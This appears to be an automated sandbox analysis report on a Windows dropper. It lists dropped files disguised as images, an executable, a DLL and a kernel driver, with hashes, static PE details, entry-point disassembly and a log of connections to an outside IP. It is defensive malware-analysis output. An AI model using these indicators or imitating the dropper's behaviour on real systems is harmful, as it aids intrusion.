Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbbH.bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.999938751921172
Encrypted:	true
SSDEEP:	98304:/AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:YndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	74E6573714D05DC035BED4A99A83061F
SHA1:	5CC29328A9FEB0CA7D16C49667A872D23D293832
SHA-256:	45B13BDFC2BDC7EDAA39C29CFB3BFBB62D7B872AADE4D9C9EA239FF03DD28BDE
SHA-512:	AF40D45BC5579270BBAECB4CE88816417212416DBD20EBB6FE67BE70944C1C43F614264505D764A98F718C47FA8D2640B3B6F0877A51369A8D325BE7599D0DAF
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.979015415982116
Encrypted:	false
SSDEEP:	192:0Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:0BuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	F7CA322B72EE704E1B98CCD06A353710
SHA1:	BA3C29D36F9095B598F96EF92C1561AC8C469EEE
SHA-256:	366CA83719B6E7680E62BC17065E9FA0A464D36F2216FE1811472418AD443DA4
SHA-512:	498541B8ADD5FE82F984503050F4FCC42A64398C9D4185353C24D0A36AF57FCC1D328BF9E83809DCBD6481F46AAE83B50349DBE114C260AAB6F6A145E734303F
Malicious:	false
Preview:	GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\Y1mbCC.exe

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.002079201163507
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fd:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gd
MD5:	71F189D23E549D58FC501D105847E375
SHA1:	A2D54E3D4CBEE59B532077D70471937F0BFB4A92
SHA-256:	D593B0C5D4BF71A10A6503AEA99DD261D3E007DF273CD2919EB3815CC1E02294
SHA-512:	6358671313BA357F852D9807D811F5F1F034E5B81499C0C4BAD8FB92C31A7519BEEEE9DE769281F5DA9205730554FAE417646F59841940595FF44994963835EF
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.229123847912864
Encrypted:	false
SSDEEP:	384:13YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/4:1OUkgfdZ9pRyv+uPzCMHo3q4tDghi
MD5:	DC05A5A2015677CFCCFC65DF3BF0778B
SHA1:	C99590BCFF5707C986CB8AC16C38C36EF8CC1D1C
SHA-256:	4071645B5A42AF2111224751CA3B7E80BE1EFDBAE85793707D7EC9D2C436DA66
SHA-512:	3569688920C78298EE82A904C7A1E78630AAB560F7364DCEC25631A9404B21A9BD238CA5CCE39DB4E1EE6C00758D56CC0FF890A56CABEF812DFD482F374B951B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................*...........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.706939537510779
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0000000000000000.exe
File size:	31'322'802 bytes
MD5:	4082e7b105c3e8adfa454f1b09890a2a
SHA1:	592725671389bbb3d2185f143b027f90dd89fc99
SHA256:	626b596d98fb4d517a9d154acaaaa215a185d13bf07d38fd1eb52940abe18e47
SHA512:	c6c0431e244c1d6e4d76c2f6cfd1493bcc8d3fa9a4b38d25769cc392c3b6b3f3d3017256c8f12bfb8d86c60107ef1560e312f7ecdc27db73905ace1b9a2a22d7
SSDEEP:	393216:CN/dn7U03/CiLJ+Rd1chCb9ayX888C88/888C88RagWjOapOTAVU3iwwB2PQ5gGV:M1Qnid+Rd2cpaCazKawRSEHfHo
TLSH:	64678C61EBFD6429F519E230789506035B11BA322D948F8B31E9511BAF5FAF37821BCC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................N..}....N&......N........;.......+.........W....N.......N%.....Rich............................PE..d...IG`S...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140008648
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x53604749 [Wed Apr 30 00:43:53 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	1e161be7fbdd881c45e950d193fc5123

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F25C081CA00h
dec eax
add esp, 28h
jmp 00007F25C08128D8h
int3
int3
jmp 00007F25C081A054h
int3
int3
int3
inc eax
push edi
dec eax
sub esp, 20h
dec ebp
mov edx, eax
inc ebp
xor eax, eax
dec ebp
test ecx, ecx
jne 00007F25C0819E86h
xor eax, eax
jmp 00007F25C0819EE1h
dec eax
test ecx, ecx
jne 00007F25C0819E97h
call 00007F25C081ADFAh
mov edi, 00000016h
mov dword ptr [eax], edi
call 00007F25C081A94Eh
mov eax, edi
jmp 00007F25C0819EC7h
dec ebp
test edx, edx
je 00007F25C0819E95h
dec ecx
cmp edx, ecx
jc 00007F25C0819E90h
dec edi
lea eax, dword ptr [ecx+ecx]
dec ecx
mov edx, edx
call 00007F25C081A05Ch
jmp 00007F25C0819E4Ch
dec eax
test edx, edx
je 00007F25C0819E8Fh
dec eax
mov edi, ecx
inc ecx
movzx eax, ax
dec eax
mov ecx, edx
rep stosw
dec ebp
test edx, edx
je 00007F25C0819E3Eh
dec ecx
cmp edx, ecx
jnc 00007F25C0819E8Eh
call 00007F25C081ADB1h
mov edi, 00000022h
jmp 00007F25C0819E37h
mov eax, 00000016h
dec eax
add esp, 20h
pop edi
ret
int3
int3
dec eax
mov eax, ecx
movzx edx, word ptr [eax]
dec eax
add eax, 02h
test dx, dx
jne 00007F25C0819E76h
dec eax
sub eax, ecx
dec eax
sar eax, 1
dec eax
dec eax
ret
int3
int3
int3
inc ebp
xor eax, eax
inc ecx
mov eax, eax
dec eax
test edx, edx
je 00007F25C0819E94h
inc sp
cmp dword ptr [ecx], eax
je 00007F25C0819E8Eh
dec eax
inc eax

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19ce0	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x2d000	0x114c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2f000	0x49c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x15490	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x370	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13fe2	0x14000	c20d9d46b7b3eb8f831d655d85e5a9fa	False	0.54891357421875	data	6.395675641477077	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x587e	0x5a00	08a0e7c2e1600a90988913d408bf319d	False	0.3506076388888889	data	4.6498718652915825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x11570	0xd600	284f99746d4e580a54a08e4dc9c30661	False	0.8229227511682243	data	7.45334711777497	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x2d000	0x114c	0x1200	08481227273137773e4199c661066582	False	0.4657118055555556	data	4.797430394465479	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2f000	0x924	0xa00	dcf0d23a87862ba5dc86026f4c1f324a	False	0.26640625	data	3.293153499318879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegOverridePredefKey, RegOpenKeyExW
KERNEL32.dll	GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleW, LCMapStringW, GetStringTypeW, RtlPcToFileHeader, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, QueryPerformanceCounter, HeapCreate, GetCommandLineW, lstrlenW, FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, RaiseException, GetVersion, GetLastError, GetModuleHandleW, CloseHandle, GetCurrentProcess, LocalFree, SetLastError, GetTickCount, LoadLibraryW, GetProcAddress, GetEnvironmentVariableW, lstrcmpiW, FreeLibrary, VirtualQuery, GetModuleFileNameW, GetCurrentProcessId, GetCurrentThreadId, OutputDebugStringA, GetPrivateProfileIntW, GetPrivateProfileStringW, Sleep, CreateFileW, WriteFile, SetFilePointer, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, TryEnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetFileAttributesExW, GetSystemTimeAsFileTime, FlushFileBuffers, HeapSetInformation, TerminateProcess, IsDebuggerPresent, ExitProcess, GetStdHandle, GlobalAlloc, GlobalLock, GlobalUnlock, GlobalFree, InitializeCriticalSectionAndSpinCount, HeapDestroy, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, GetProcessHeap, GetCommandLineA, GetStartupInfoW, DecodePointer, EncodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, RtlUnwindEx, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, VirtualAlloc, GetFileType, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc
SHLWAPI.dll	PathAppendW, PathRemoveExtensionW, PathRemoveFileSpecW, PathStripPathW
SHELL32.dll	CommandLineToArgvW
USER32.dll	CharLowerBuffW, wsprintfW, MessageBoxW, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 08:24:24.160691023 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:24.160718918 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:24.160794020 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:24.173113108 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:24.173129082 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.391074896 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.391247034 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.392585039 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.392733097 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.473788977 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.473800898 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.474205971 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.474268913 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.475665092 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.519366026 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.786071062 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.786124945 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.786144972 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.786189079 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.786248922 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.786293983 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:25.786297083 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.786333084 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.792433023 CET	49891	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:25.792443037 CET	443	49891	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:26.282408953 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:26.282445908 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:26.282680035 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:26.282898903 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:26.282912016 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.498446941 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.498512030 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.498908997 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.498915911 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.499072075 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.499077082 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.848261118 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.848278046 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.848330021 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.848361969 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.848375082 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.848406076 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.848607063 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.848654985 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.849462986 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.849523067 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.850099087 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.850162029 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.935077906 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.935112953 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.935129881 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.935153008 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.935163975 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.935193062 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.935713053 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.935760975 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.935762882 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.935770988 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.935800076 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.935812950 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.936685085 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.936713934 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.936733007 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.936739922 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.936758041 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.936781883 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.937630892 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.937671900 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.938050985 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.938096046 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:27.979779959 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:27.979825974 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.021908045 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.021940947 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.021965027 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.021971941 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.022128105 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.022128105 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.022135019 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.022146940 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.022183895 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.022197008 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.022289038 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.022325039 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.022332907 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.022336960 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.022352934 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.022376060 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.023227930 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.023272991 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.023279905 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.023292065 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.023324966 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.023334980 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.023355961 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.023395061 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.024534941 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.024569035 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.024588108 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.024599075 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.024611950 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.024612904 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.024626017 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.024632931 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.024653912 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.024683952 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.025155067 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.025198936 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.025363922 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.025393009 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.025410891 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.025418043 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.025429964 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.025451899 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.066593885 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.066659927 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.066680908 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.066864014 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.108791113 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.108860016 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.108896017 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.108983994 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.109045982 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.109054089 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.109080076 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.109080076 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.109375000 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.109421968 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.109427929 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.109442949 CET	443	49907	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:28.109460115 CET	49907	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:28.109487057 CET	49907	443	192.168.2.4	39.103.20.97
